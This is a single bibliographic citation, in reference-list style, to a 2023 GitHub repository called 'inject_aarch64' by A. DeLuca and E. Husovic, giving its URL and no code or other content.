A. DeLuca and E. Husovic, “inject_aarch64,” NSoft, GitHub Repository, 2023. [Online]. Available: https://github.com/ReverseApple/inject_aarch64
